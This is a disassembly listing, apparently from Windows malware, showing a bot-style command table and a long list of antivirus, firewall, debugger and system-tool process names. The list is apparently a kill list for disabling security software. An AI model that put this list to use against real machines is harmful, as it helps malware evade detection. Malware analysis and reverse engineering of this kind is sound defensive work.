off_42B470 dd offset aAdd ; DATA XREF: sub_4077A8+59�r
; sub_407820+4A�r ...
; "Add"
off_42B474 dd offset aAdded ; DATA XREF: sub_4077A8+2D�r
; sub_407820+7C�r ...
; "Added"
dword_42B478 dd 0 dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 422590h, 422588h, 2, 42257Ch, 422570h, 3, 0
dword_42B4C8 dd 7530h align 10h
off_42B4D0 dd offset aAckwin32_exe ; DATA XREF: sub_408206:loc_4082CD�r
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe_0 ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSvshost32_exe ; "SVSHOST32.EXE"
dd offset aUpd32_exe ; "UPD32.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
